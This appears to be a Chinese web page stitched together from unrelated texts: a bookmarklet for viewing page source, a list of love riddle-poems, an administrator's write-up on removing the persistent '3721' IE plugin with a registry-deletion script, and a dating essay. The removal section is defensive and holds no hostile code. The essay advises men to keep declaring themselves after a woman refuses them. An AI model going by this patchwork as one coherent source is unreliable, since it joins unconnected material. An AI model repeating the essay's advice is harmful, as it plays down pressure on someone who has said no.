javascript:s=document.documentElement.outerHTML;document.write(’<body></body>’);document.body.innerText=s;

源代码就出来了.不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果.

1:天鹅飞去鸟不归,怀念昔日空费心,云开月下双匕影,水流几处又相逢,日落月出人倚月,单身贵族尔相随。(我不能没有你)

  2:天鹅飞去鸟不归,良字无头双人配;受字中间多两笔(双木非林心相连),人尔结合就是自己。(我很爱<想>你)

  3:青山寺上一丛竹,天鹅还在鸟已去。前尘往事以成空,白云心中多条虹。心中有情藏不住,站在高处看远方。称断人和有谁知。 (等我亲自说爱你)

  4:天鹅湖边鸟飞绝,白天相约解相思,唯忘只得我关心,双点齐把国玉移,无奈如何人归去,宝玉不见于谷外,双思只在内心旁,单身贵族尔相连。(我的心只可容纳你)

  5:天鹅飞去鸟不归,回峰山中我独醉。良辰(晨)美景斜眼看,孤独寂寞深深埋。日夜花草为依伴,青春虚度苦不堪。此番招罪为哪般,有朝一日兄台来。(我仍朝思暮想着你/我一直在深爱着你/我峨嵋派弃暗投明 )

  6:天鹅一出鸟不见,一月有别心想你,一个人在把心牵,单身贵族已相连,双匕割月旁边站,树木靠土冲天跃,水流几处又落天,月里嫦娥口最甜。(我不能没有你杜鹃)

  7:天鹅飞去鸟未归,两木相连心相连,日去东海月归西,春季秋东是四季,良字无头死紧迫,您若无缘各自飞,丝线一家十一口,女氏出门何日归。(我想明年和你结婚)

  8:情到浓时人憔悴,爱到深处心不悔,念你忘你都不对,宁愿伤心自己悲。不怨苍天不怨谁,人生不如梦一回, 惯看花开花又谢,却怕缘起缘又灭。(青梅竹马两小无猜/痴情错负命运多变)

  9:心死两相依,知己所言真,人在尔旁站,饥饿去无食,故人想永共,还来还要走,至死都相遇。(忘记你我做不到)

  10:星星不见太阳光,永眠长逝莫悲伤,虚空极尽莫能计,每在心旁总情长,人随水去泪汪汪,心力点点酒苍茫,还记十月相倚伴,谁人犹在我他旁。(生死无悔全为有你)

  11:日出美丽立取上,残月屋下友情长,无奈您却无心往,白水一勺表衷肠,春雨绵绵别三笑,但已人去走下场,嫦娥无女不寻常。(最爱你的人是我)

  12:一人尔旁站,橘红无丝织,无山登峨嵋,椰子亦能语,深藏不见底,白芍本非草,寒冬病缠身。(你是我心中的疼)

  13:牛靠和尚屋,两人抬一木,两木不成林,水中鸳鸯成双对,一心两意记念谁,丝线穿针十一口,女氏还在日上游。(特来相亲想结婚)

  14:情到浓时心憔悴,爱到深处心不悔,念你忘你都不对,宁愿伤心自己背。(青梅竹马)

  15:树撑天枝难觅,怀抱可怜却无心,赵国有妃不是女,鹅血满天鸟难得,远去不想囊羞涩,受尽苦难又换友,无奈心中只有你。(对不起我不爱你)

  16:飞蛾扑火虫已逝,学友无子留撇须,偶尔留得一人在,三言并没有两语,牛仔过河搭木筏,仕别三日在这里,原来这字在界前。(我爱你一生一世)

  17:接受又离只作友,情人无心土月勾,竹已孤竹单思苦,从也单从独自愁,如需闭口一了伴,谁人无言又同游。 (爱一个人好难)

  18:寒山寺上一棵竹,不能做称有人用,此言非虚能兑现,只要有情雨下显,天鹅一出鸟不见。 (等你说爱我)

  19:淮海又见水退时,双人换走阻碍石,月顶右手不见口,青年男女树心旁,世上何物最懂爱。 (难得有情人)

  20:孝子要习文,鹅边鸟飞去,饶人必无心,河干人独立,还来还要走,相思只一心,好女愿他旁。(叫我如何不想她)

  21:木目跨于心,古人做反文,小和尚光头,凄惨无泪水。(想做你妻)

  22:鸟飞鹅跳,月上中梢,目上朱砂,已异非巳,勺旁傍白,万事开头,工戈不全,雨下挚友,称断人和。(我用自己的方式爱你)

  23:悔意无心空对,大哥头上有条,接受不离只作,单身贵族尔相,朝夕相对盼夕,情人别离影孤单,二人想逢在此处。(每天爱你多一些)

  24:友情雨下永相拌,人情相遇有艾时,大雁南飞非人字,方知缘了应无点,除夕过后是何天?(爱你一万年)

  25:竹林上下一寒寺,他儒我僧少一仙,风中一人丘上立,矢口否认想成仙,尔等一人身旁站,百驹过隙空长叹,低头不语连疾走,遍山找寻头顶冠。(你知道我在等你吗)

  26:日长夜短愁几许,高处无口几人来,一人游弋芳草地,十士脚长披蓑衣,天鹅展翅鸟已飞,白勺烹酒无意义,空余一钩三点雨。(月亮代表我的心)

  27:古树遮天枝难见,怀内无心甚可怜,赵国有妃不是女,鹅毛轻飘鸟不见,受尽苦难又挽有,自称有人伴君旁。接受又离又做友,情人无心土月勾,竹已孤竹单思苦,从也不从独自愁,如须闭口一了伴,谁人无语又同游。 (对不起我爱你,爱一个人好难)

  28:何水无鱼?何山无石?何人无父?何女无夫?何树无枝?何城无市?

  (源于释迦凡尘语录,名曰劝修经,南水无鱼?无山无石?阿人无父?弥女无夫?陀树无枝?佛城无市?六字乃南无阿弥陀佛,后列为语咒。释迦行于尘,无日,无食,不眠,不休,受想行识亦复如是,是诸法空相:南无阿弥陀佛。 )

  29:有花无月恨茫茫,有月无花恨转长,花美似人临月镜,月明如水照花香, 扶筇月下寻花步,携酒花前带月尝,如此花好如此月,莫将花月作寻常 (唐伯虎《花月吟》,不是谜语,有解释为“花前月下对酒当歌”和“受不了你们這些人”两种说法)

  30:天鹅飞来鸟不归,回峰山中我独醉,良晨美景斜眼看,孤独寂寞深深埋,日夜花草为依伴,青春虚度苦不堪,此番招罪为哪般,有朝一日兄台来(无解,有“我中******瞎掰的”,“我一直在深爱着你”,“我仍朝思暮想着你”等几种说法)

  31:相思的泪打湿无眼的枕,相爱的情折磨失意的魂;相恋的人徘徊离别的街,相牵的人感受分离的苦(无解,非谜)

  32:为情所困难潇洒,红尘如烟我太傻,恩怨真假美丽神话,春夏秋冬为情感化。闭上嘴巴沉默不华,甩掉墨镜让泪落(无解,非谜)

  33:春雨季,梧桐树上结丝绸;夏日凉,两人阵中称英雄;秋风起,鸿雁传音数千里;冬雪飘,美女为何露半腰(绝对重要)

  34:木目跨于心,古人做反文,小和尚光头,凄惨无泪水(想做你妻)

  35:树儿睁开眼,小子屋下眠,良心缺一点,日落残兔边(相见恨晚)

  36:鸟飞鹅跳,月上中梢,目上朱砂,已异非巳,勺旁傍白,万事开头,工戈不全,雨下挚友,称断人和(我用自己的方式爱你)

  37:古树撑天枝难觅,怀抱可怜却无心,赵国有妃不是女,鹅毛轻飘鸟不见,远去不想囊羞涩,受尽苦难又换友,自称有人伴君旁(对不起我还爱你)

  38:原本有心花不开,偶尔有人来相伴,悔时无心已有泪,吞下口去悄无声,来者耳边轻轻诉,缺少左边心相印,东风带走一二点(愿你每天都快乐)

  39:两难全,二尤泪流;梅依旧,移木有心。不羁去,挥鞭策马;友朋离,乃共婵娟。(无悔四月)

  40:树有心眼,西下美女,手扶下巴,人在尔旁,心死相依,言及自己,十件家具,白色勺子,子女双全,又住一起。(想要把你忘记真的好难)

  41:狼无良心在青山,山山相叠真壮观,有米一斗头上顶,下人抬头日为天,百日去一剩九九,知在里来病在边(猜出来是白痴)

  42:日长夜短愁几许,高处无口几人来,一人游弋芳草地,十土脚下披衣裳,天鹅展翅鸟不回,白刀纯酒无意义,空儿一钩三点雨(月亮代表我的心)

  43:我心载着你,不上你的船,已在不言中,双人日下行,燕子离鹅去,马口解猜疑(您还记得我吗)

  44:原本有心爱相随,付出寸心有尔时,二人无缘难相配,牛过独木是人为,无言难平情缘事,宝玉只为女人醉(愿你一生平安)

  45:二人同游一人还,水天相隔望佳人,映月荷花不露角,夕阳西下赴明月,海底捞针苦苦寻,卧虎藏龙方十里,名花无主迟迟早(天涯何处无芳草)

  46:牛撞和尚屋,两人抬一木,两木不成林,月下弯又曲,东南西北路遥遥,八仙过海坐把刀,一男一女并排站,两颗青竹比天高(特來相見十分好笑)

  47:友情又失月下愁,夕阳西斜夕当头,步入情海无止境,受害只能又焕友,骑士缺马一人走,似是伊人已分手,千里相逢在何年,藉此惜别二十秋。(有多少爱可以重来)

  48:一线情缘牵白头,日日思念排忧愁,不要怪我痴情种,见你常在梦境中。如果你我本有缘,隔山离水一线牵,三月桃花正旺盛,秋后果实最香甜(一日不见如隔三秋,藏头诗)

  近日接到内网用户来报,在上到某些站点的时候,会被提示安装一个叫3721中文实名的插件,部分用户在不知情的情况下误点“安装”选项,导致该病毒驻留于硬盘上难以杀除。天缘虽是网络管理员,但是对Windows操作系统的确使用得不多,从来也没有用过这个名为3721的插件,但看到用户们焦急地神情,于是答应尽力而为。经过几番努力,终于将其斩于马下。 以下是杀除该病毒得经历及病毒解决方案。  

  天缘使用一台windowsxp机器,访问用户提供的站点,下载并执行了该插件。该插件为中文,自动安装后重新启动机器后生效,并自带卸载功能。通过安装/卸载前后的对比观察,其驻留性、自身保护性及对系统性能的大量损耗,让天缘确定了该插件确是病毒无疑!  

  病毒发作现象:  

  自动将浏览器的“搜索”功能重定向到一个叫www。3721。com的网站,该站点为中文站,且无法修改; 

  强行在用户ie上添加“情景聊天”、“上网加速”等几个图标;  

  不断刷新注册表相关键值,以达到成功驻留和大量消耗用户主机资源的目的;  

  每次启机加载,并自带进程保护功能,在正常地windows启动下难以杀除;  

  带自动升级功能,每次用户上网使用ie时,该病毒会后台执行升级;

  病毒自身特点:  

  自带卸载功能;该病毒为达到隐藏自身目的,麻痹下载插件用户的目的,提供了卸载程序。但根据天缘的使用情况发现,在卸载后,该病毒程序依然驻留,启动时仍然加载,依然监视、改写注册表;  

  采用网络升级方式;该病毒为了防止用户以及杀毒软件的杀除,采取定期网上升级的方式,这点与近期的其他Windows主流病毒类似,但值得一提的是该病毒建有公开的病毒升级站点www。3721。com,且站点风格酷似门户、服务类站点,具有极大的欺骗性;

  以驱动模式加载;该特性可说是近段时期以来病毒编写的一次技术飞跃,采用驱动模式加载配合挂接hook的方式,在windows下极难查杀(详细技术讨论见后);  

  提供在浏览器地址栏中输入中文后转到其站点进行关键字查询的搜索服务。前段时间的冲击波克星病毒也曾在感染用户机器后自动连接用户的机器到update.Microsoft.com下载补丁,看来新的病毒越来越多地喜欢提供一些另类功能了;  

  被动方式传播:利用一些站点来进行传播,而不是主动感染其他机器,这点与当前热门的“美女图片”病毒的方式相近。从主动转向被动,可说是今年一些病毒的新特点。

  病毒详细分析:  

  当用户访问站点的时候,弹出一个控件下载窗口提示用户下载安装,表面上称自己是提供中文实名服务,引诱用户安装;  

  在安装过程中多处修改用户文件及注册表;

  添加文件:  

  在Documents and SettingsAll Users「开始」菜单程序网络实名 目录下添加:  

  了解网络实名详细信息。url 86 字节  

  清理上网记录。url 100 字节  

  上网助手。url 99 字节  

  卸载网络实名。lnk 1,373 字节  

  修复浏览器。url 103 字节  

  在WINDOWSDownloaded Program Files 下添加:
  
  assis.ico 5,734 字节  

  cns02.dat 1,652 字节  

  CnsHook.dll 56,320 字节  

  CnsMin.cab 116,520 字节  

  CnsMin.dll 179,712 字节  

  CnsMin.inf 378 字节  

  sms.ico" 6,526 字节  

  yahoomsg.ico 5,734 字节  

  在WINDOWSSystem32Drivers 目录下添加:  

  CnsminKP.sys  

  添加注册表键值:  

  增加HKEY_LOCAL_MACHINESOFTWARE3721 主键,下设多子键及属性值;  

  在HKEY_LOCAL_MACHINESOFTWAREClassesCLSID 主键下增加  

  两个子键  

  在HKEY_LOCAL_MACHINESOFTWAREClasses主键下增加  

  CnsHelper.CH  

  CnsHelper.CH.1  

  CnsMinHK.CnsHook  

  CnsMinHK.CnsHook.1四个子键  

  在HKEY_LOCAL_MACHINESOFTWAREClassesInterface主键下增加子键  

  在HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib主键下增加  

  在HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerAdvancedOptions主键下增加!CNS子键  

  在HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerExtensions 主键下增加  

  五个子键  

  在HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSearch主键下增加  

  CustomizeSearch  

  OcustomizeSearch  

  SearchAssistant  

  OsearchAssistant 四个子键  

  在HKEY_LOCAL_MACHINESOFTWAREMicrosoft WindowsCurrentVersionExplorerShellExecuteHooks主键下增加子键  

  在HKEY_LOCAL_MACHINESOFTWAREMicrosoft WindowsCurrentVersionRun下增加CnsMin子键  

  在HKEY_LOCAL_MACHINESOFTWAREMicrosoft WindowsCurrentVersionRunOnce下增加EK_Entry 子键 (提示,这个键将在下次启动机器的时候生效,产生最令人头疼的部分,后文会叙述)  

  在HKEY_LOCAL_MACHINESOFTWAREMicrosoft WindowsCurrentVersionUninstall下增加CnsMin 子键
 
  在HKEY_CURRENT_USERSoftware下增加3721子键  

  在HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain下增加  

  CNSAutoUpdate  

  CNSEnable  

  CNSHint  

  CNSList  

  CNSMenu  

  CNSReset  

  在重新启动计算机后,上面提到的RunOnce下的EK_Entry生效,在注册表中多处生成最为邪恶的CnsMinKP键值,同时在系统盘的windows/system32/drivers目录下生成CnsMinKP.sys文件,噩梦由此开始。  

  由于win2k/xp在启动的时候(包括安全模式)默认会自动运行windows/system32/drivers下面的所有驱动程序,于是CnsMinKP.sys被加载,而这个驱动的作用之一,就是保证windows/ Downloaded Program Files目录下的Cnshook.dll和CnsMin.dll以及其自身不被删除;Cnshook.dll的作用则是提供中文实名功能,CnsMin.dll作用在于使其驻留在ie进程内的时候。CnsMin为了保证自己的优先级最高,用了一个定时器函数反复安装钩子,因此造成系统性能下降,在天缘测试的那台机器上,使得性能大概下降了20%左右。而且由于hook强行挂接的原因,当用户使用断点调试程序的时候将会导致频繁出错,这一点与早期版本的cih导致winzip操作和无法关机类似(关于详细的技术细节,可参看题目为《[转载]3721驻留机制简单研究》一文,原作者Quaful@水木清华)

  防删除特性:  

  该病毒虽然自带一个所谓的“卸载程序”,但事实上核心部分的程序/注册表键值依然没有删除。而且该病毒更是利用各种技术手段,具有极其强大的反删除特性。  

  windows系统启机(包括安全模式下)便会加载windows/system32/drivers下的CnsMinKP.sys,该驱动该驱动程序过滤了对其自身及相关重要文件和注册表的删除操作。每当试图删除3721的关键文件和注册表项时,直接返回一个TRUE,使Windows认为删除已经成功,但文件和注册表实际上还是在那里。  

  技术亮点:  

  天缘不得不承认,3721这个病毒插件可称我作为网管以来面对的最难清除的病毒。近几年来病毒有几次质的突破:cih感染可升级的bios、红色代码打开windows的共享扩大战果、meliza让我们见识了什么是看得到源程序的病毒、mssqlserver蠕虫让我们留意到计算机病毒能攻击的不光是节点还有网络设备、冲击波病毒让我们认识到大量使用同一种操作系统时在出现安全漏洞时的可怕、美女图片病毒让我们知道了将欺骗艺术与软件漏洞结合的威力、而这次3721病毒首次展现了病毒强大的反删除特性,可说是在windows环境下无法杀除的病毒。虽然这是个良性病毒,对系统并没有破坏特性,但依据病毒的发展史,可以预见,这种几近完美的反删除技术将很快被其他病毒所利用,很快将被其他病毒所利用。届时结合网络传播,局网感染带强大反删除功能的病毒或许会让目前windows平台下的杀毒软件遭遇到最大的考验。而这次经历,也让我意识到微软的windows操作系统在人性化、美观化、傻瓜化的背后的危机。作为it同行,我个人对3721病毒作者所使用的种种技术表示钦佩,但新型病毒的潘多拉魔盒,已经被他们打开。  

  在目前已知的病毒历史上,之前只有几种病毒利用过windows nt下的system32/drivers 下的程序会被自动加载的特性来进行传播,但那些病毒本身编写地不够完善,会导致windows nt系统频繁蓝屏死机,象3721插件病毒这样完美地加载、驻留其他进程,只消耗主机资源,监测注册表及关键文件不导致系统出错的病毒,国内外尚属首次,在技术上比以前那些病毒更为成熟;  

  如同天缘和大家曾经探讨过的没打sp2以上patch的win2k如何上网下载sp4再安装补丁这样的连环套问题一样。由于drivers目录下的CnsMinKP.sys启机必定加载,而欲不加载它,只有在windows启动后,进注册表改写相应的CnsMinKP键值或者删除该文件,但由于CnsMinKP.sys过滤了对其自身及相关重要文件和注册表的删除操作。每当试图删除3721的关键文件和注册表项时,直接返回一个TRUE,使Windows认为删除已经成功,但文件和注册表实际上还是在那里。使得注册表无法修改/文件无法被删除,让我们传统的杀除病毒和木马的对策无法进行。  

  驻留ie进程,并自动升级,保证了该病毒有极强大的生命力,想来新的杀除方法一出现,该病毒就会立即升级。Windows上虽然还有mozilla等其他浏览器,但由于微软的捆绑策略和兼容性上的考虑,绝大多数用户一般只安装有ie.上网查资料用ie,寻找杀除3721资料的时候也用ie,如此一来,3721抢在用户前面将自身升级到最新版本以防止被杀除的可能性大大增加,更加增添了杀除该病毒的难度。或许在本文发出后,病毒将会在最短时间内进行一次升级。  

  附带其他“实用”功能。天缘记得早年在dos下的时候曾遇到一些病毒,在发作的时候会自动运行一个可爱的屏幕保护,或者是自动替用户清理临时文件夹等有趣的功能;后来在windows平台上也曾见过在病毒发作时自动提醒“今天是xx节,xx年前的今天发生了xx历史典故”这样的带知识教育意义的病毒;而3721病毒则是提供了一个所谓的中文域名与英文域名的翻译功能。随着病毒的发展,这样带隐蔽性、趣味性和欺骗性的病毒将越来越多。例如最近的邮件病毒以微软的名义发信,或以re开始的回信格式发信,病毒编写的发展从原来的感染传播、漏洞传播、后门传播逐步向欺骗传播过渡,越来越多的病毒编写者意识到社会工程学的重要性。或许在不久的将来,就会出现以简单的网络游戏/p2p软件为掩饰的病毒/木马。  

  极具欺骗性:该插件在win98下也能使用,但使用其自带的卸载程序则可比较完美地卸载,而在win2k/xp平台下卸载程序则几乎没用。由此可以看出病毒编写者对社会工程学极其精通:当一个人有一只表时他知道时间;而当他有两只表时则无从判断时间。当在论坛/bbs上win2k/xp的用户提到此病毒无法删除的时候,其他win2k/xp用户会表示赞同,而win98用户则会表示其不存在任何问题属于正常程序的反对意见。两方意见的对立,影响了旁观者的判断。  

  商业行为的参与。据传该病毒是由某公司编写的,为的是进一步推销其产品,增加其访问量和申请用户。这点上与某些色情站点要求用户下载xx插件,之后不断利用该插件弹出窗口进行宣传的方式很象。天缘不由得想起一个典故。话说当年某公司公司工作人员(当然也有可能是不法者冒充该公司的工作人员)经常打电话恐吓大型的企业单位,无外乎说其中文域名已被xx公司抢注,如不交钱将会导致xx后果云云。兄弟学校中似乎也有受到此公司骚扰的经历:该公司员工打电话到某高校网络中心,起初是建议其申请中文域名,其主任很感兴趣但因价格原因未果。第二次打来的时候,就由劝说变成了恐吓,说该校中文名字已经被xx私人学校注册,如果该校不交钱申请就会有种种可怕后果云云。谁想该校网络中心主任吃软不吃硬,回话:“你既然打电话到此,想来你也知道在中国,xx大学就我们一所是国家承认的,而你们公司在没有任何官方证明的情况下就替申请我校中文域名的私人学校开通,就这点上就可见你们的不规范性,那么如果我私人交钱申请xxx国家领导的名字做个人站点是不是贵公司也受理?遇到类似冒用我校名义行骗及协助其行骗的公司,我们一贯的做法是寻找法律途径解决!”回答甚妙,当然此事后果是不了了之。从相关报道中不难看到,计算机犯罪逐步开始面向经济领域。侵犯私人隐私,破坏私人电脑的病毒与商业结合,是病毒编写由个人行为到商业行为的一次转变,病毒发展的历史由此翻开了新的一章。

  病毒查杀方案:  

  由于网管专题的栏目作用主要是“授人与渔”,天缘把病毒查杀过程经历一并写下,大家共同探讨。  

  第一回合:  

  当初见此病毒的时候,感觉不过如此,普通木马而已。依照老规矩,先把注册表里相关键值删除,再把病毒文件一删,然后重新启动机器,等待万事ok.启机一看,注册表完全没改过来,该删除的文件也都在。  

  结局:病毒胜,天缘败。  

  第二回合:
  
  换了一台机器,下了个卸载帮助工具,以方便监视注册表/文件的改变。我下的是Ashampoo UnInstaller Suite这个软件,能监视注册表/文件/重要配置文件。Ok,再次安装3721插件,把对注册表的改变/文件的改变都记录下来。(值得注意,因为注册表run和runonce的键是下次启动的时候生效的,因此在重新启动后,还要对比一下文件/注册表的改变才能得到确切结果)。然后对比记录,把3721添加的键全部记下来,添加的文件也记录下来。之后我计划是用安全模式启动,删除文件和注册表,所以写了一个save.reg文件来删除注册表里的相关键值(写reg文件在网管笔记之小兵逞英雄那讲有介绍,等一下在文末我提供那个reg文件给大家参考),写了一个save.bat来删除相关文件,放到c盘根目录下。重新启动机器,进入安全模式下,我先用regedit /s save.reg 导入注册表,然后用save.bat删除相关文件。重新启动机器,却发现文件依然存在,注册表也没有修改成功。通常对付木马/病毒的方式全然无效,令我产生如临大敌之感。

  结局:病毒胜,天缘败。
  
  第三回合:  

  重新启动机器,这次我采用手工的方式删除文件。发现了问题——对system32/drivers目录下的CnsMinKP.sys,WINDOWSDownloaded Program Files 目录下的Cnshook.dll和CnsMin.dll都“无法删除”。这样说可能有点不妥当,准确地说法是——删除之后没有任何错误报告,但文件依然存在。于是上网用google找找线索——在绿盟科技找到了一则文章(名字及url见前文),于是明白了这一切都是CnsMinKP.sys这东西搞得鬼。那么,只要能开机不加载它不就行了??但试了一下2k和xp的安全方式下都是要加载system32/drivers下的驱动,而如果想要取消加载,则需要修改注册表,但由于在加载了CnsMinKP.sys后修改注册表相关值无效,导致无法遏制CnsMinKP.sys这个程序的加载。当然,有软驱的朋友可以利用软盘启动的方式来删除该文件,但如果跟天缘一样用的是软驱坏掉的机器怎么办呢?记得绿盟上的文章所说的是——“目前无法破解”。在这一步上,天缘也尝试了各种方法。  

  我尝试着改这几个文件的文件名,结果没成功;  

  我尝试着用重定向来取代该文件,如dir * > CnsMinKP.sys ,结果不成功;

  我尝试着用copy con <文件名> 的方式来覆盖这几个文件,结果发现三个文件中Cnshook.dll可以用这样的方法覆盖成功,但是在覆盖CnsMinKP.sys和CnsMin.dll的时候,居然提示“文件未找到”!?熟悉copy con用法的朋友都该了解,无论是文件是否存在,都应该是可以创建/提示覆盖的,但居然出来这么一个提示,看来CnsMinKP.sys着实把系统都骗过了,强!!跟它拼到这里的时候,回想到了在dos下用debug直接写磁盘的时代了,或许用它才能搞定吧?  

  仔细一想,win2k/xp下似乎没有了debug程序了,而或许问题解决起来也不是那么复杂。再又尝试了几种方法后,终于得到了启示:既然文件不允许操作,那么##作目录如何?  

  我先把windowssystem32drivers目录复制一份,取名为drivers1,并将其中的CnsMinKP.sys删除(注意,因为是drivers1中的,所以可以被成功地真正删除掉);

  重新启动机器,到安全模式下;  

  用drivers1目录替代原来的drviers目录  

  cd windowssystem  

  ren drivers drivers2  

  ren drivers1 drivers  

  之后重新启动机器,然后进到windows后先把drivers2目录删除了,然后慢慢收拾残余文件和清理注册表吧。在这里天缘提供一个reg文件,方便各位删除注册表:  

  Windows Registry Editor Version 5.00(用98的把这行改成regeidt4)  

  [-HKEY_LOCAL_MACHINESOFTWARE3721]  

  [-HKEY_LOCAL_MACHINESOFTWAREClassesCLSID\]  

  [-HKEY_LOCAL_MACHINESOFTWAREClassesCLSID\]  

  [-HKEY_LOCAL_MACHINESOFTWAREClassesCnsHelper.CH]  

  [-HKEY_LOCAL_MACHINESOFTWAREClassesCnsHelper.CH.1]  

  [-HKEY_LOCAL_MACHINESOFTWAREClassesCnsMinHK.CnsHook]  

  [-HKEY_LOCAL_MACHINESOFTWAREClassesCnsMinHK.CnsHook.1]  

  [-HKEY_LOCAL_MACHINESOFTWAREClassesInterface\]  

  [-HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib\]  

  [-HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib\]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerAdvancedOptions!CNS]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerExtensions\]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionUninstallCnsMin]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerExtensions\]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerExtensions\]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerExtensions\]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerExtensions\]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerExtensions\]  

  [-HKEY_CURRENT_USERSoftware3721]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSearchOCustomizeSearch]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSearchOSearchAssistant]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSearchCustomizeSearch]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSearchSearchAssistant]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionExplorerShellExecuteHooks\]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunCnsMin]  

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunOnceEK_Entry]  

  [-HKEY_USERSS-1-5-21-789336058-764733703-1343024091-1003SoftwareMicrosoftInternet ExplorerMainCNSAutoUpdate]  

  [-HKEY_USERSS-1-5-21-789336058-764733703-1343024091-1003SoftwareMicrosoftInternet ExplorerMainCNSEnable]  

  [-HKEY_USERSS-1-5-21-789336058-764733703-1343024091-1003SoftwareMicrosoftInternet ExplorerMainCNSHint]  

  [-HKEY_USERSS-1-5-21-789336058-764733703-1343024091-1003SoftwareMicrosoftInternet ExplorerMainCNSList]  

  [-HKEY_USERSS-1-5-21-789336058-764733703-1343024091-1003SoftwareMicrosoftInternet ExplorerMainCNSMenu]  

  [-HKEY_USERSS-1-5-21-789336058-764733703-1343024091-1003SoftwareMicrosoftInternet ExplorerMainCNSReset]  

  结局:病毒败,天缘胜。

  (虽然是成功地删除了它,但是感觉赢得好险,如果该病毒加一个禁止上级文件改的功能那么就真的没折了,为了预防类似的情形,最后还是找到了彻底一点的办法,见下)  

  第四回合:

  聪明的读者大概已经想到,既然没有办法在硬盘启动对于c盘是fat32格式的机器,想到这里已经找到了解决办法——用win98启机软盘启动机器,然后到c盘下删除相关文件,然后启动到安全模式下用save.reg把注册表搞定就行了。问题是——大多数win2k/xp都使用的是新的ntfs格式,win98启机软盘是不支持的!怎么办?有软驱的机器可以做支持NTFS分区操作的软盘,用ntfsdos这个软件就能做到。而跟天缘一样没有软驱的朋友,别忘记了win2k/xp开始加入的boot,不光是能够选择操作系统而已,而是跟linux下的lilo和grub一样,是一个操作系统引导管理器——换句话说,如果我们能在硬盘上做一个能读写NTFS的操作系统,再用boot进行引导,那么不是就可以在无软驱的情形下实现操作c盘的目的了么?在网络上找到vFloppy.exe 这个软件,它自带一个支持读写ntfs的镜象文件,并且使用简单,非常傻瓜化。然后删除3721的相关文件,重新启动后清理注册表和删除相关文件就行了。  

  到此,我们终于把3721这个阴魂不散地幽灵彻底赶出了我们的硬盘!!  

  由于不少网站基于各种原因,在显示页面的时候都会弹出3721的下载窗口,很容易误点。在ie中就能屏蔽掉该站以及其他恶意的任何下载。  

  截止发稿为止,天缘所知不少同行网管已经在网关上做了对该地址的屏蔽,防止不知情的用户无辜受害。网络安全任重道远,还要*大家的努力才能把一些害群之马斩草除根。

我是女生,看到有的男生想追自己喜欢的女孩子又不敢追,还想人家倒追她,我很反感。

  从一个女生的角度,我比较了解女孩子的心理。女孩子大多不会主动出击,去追求自己喜欢的男孩,除了确实太喜欢了或者是那种比较有个性的勇敢的 女孩子。所以,如果你很喜欢一个女孩子,并且认为她对你也有点意思,那就主动点,别跟她搞拉锯战,自己难受,说不定你喜欢的人也痛苦。

  任何一个女孩子在被人追的时候,心理都是很复杂的。她也许很开心,但是又带着点惶恐,她对这个闯进自己平静的生活的男孩子,有着欲拒还迎的矛盾心理,她不是故意的。不要以为她在考验你,她其实也在和自己斗争,她怕受到伤害。

  不要怕你的主动会带来她的反感,你不主动,她也不主动,也就慢慢淡下来了。如果你开始的表白被她拒绝,那也很正常呀。不要气馁,谁知道这个女孩子心里在想什么呢?

  也许你再表白两次,她就会被你打动,一个心地善良的好女孩是很容易感动的。

  如果你受到一次挫折,就立刻离开,再也不去答理这个女孩,把自己紧紧地保护起来,默默地舔舐伤口,在你痛苦的同时,殊不知,那个女孩子也许也 正在心里遗憾、后悔呢!也许她会偷偷哭泣,后悔拒绝了你,再看到你漠然的眼神,她也很痛心,但是她却不会对你说,绝对不会请求你回来追她。你的过度的自尊 心,可能会伤害了女孩子敏感的心。

  她会认为你不是真诚的喜欢他,要不怎么会就这么放弃了她?

  有人说,男生真难,追女孩子太不容易了。可是我的感觉却是,这种现象跟男人和女人的社会角色定位是分不开的,从生理和社会的角度,女人总是被 动的。如果反过来,让男人都脉脉含羞,女人变得勇往直前,世界才乱了套呢!女人的羞涩总是美好的、动人的呀~我总是听说是某个勇敢的男人战胜了多少困难, 最终获得佳人芳心。相反的例子却少得很。

  有的男生,就怕别人说自己什么死缠烂打,落下不好的名声。可是我觉得男生追求自己喜欢的女孩子,受了点挫折还继续对这个女孩子好,说明人家确 实很喜欢,很有诚意,如果没成功,也不遗憾,并没什么啊?谁让人家喜欢了?最讨厌别人跟着瞎掺乎,也最讨厌那种自己没主意,过于在乎别人对自己看法的男 生,活该这种男生找不到女朋友。

  是男人就勇敢点,女孩子本来就感性,容易沉浸在爱情里。虽然你付出了辛苦,而一旦你的真心打动了她,那么你得到的将是更多更久的加倍的爱。这 样的例子,在身边比比皆是。女孩子对自己的男朋友都是很温柔很贴心的,为了换来这份甜蜜,开头的辛苦算什么啊?而且大多好女孩都爱得挺投入挺专一的。

  所以,建议有的男生勇敢一点,去追求自己喜欢的女孩子,不要那么畏畏缩缩,一来是让人觉得你没男人气概,二来是你自己怪难受的,然而最最最重要的还是:最后你什么都得不到。幸福总是自己挣来的,别指望别人施舍给你!

  再补充一句,我觉得主动点儿挺好的,因为你的目标是你自己真心喜欢的,女孩子往往被动,被动的只能选择接受和拒绝,所以我宁愿主动出击,爱我所爱,无怨无悔!

  -----人生很美好,快乐在其中,要学会寻找!

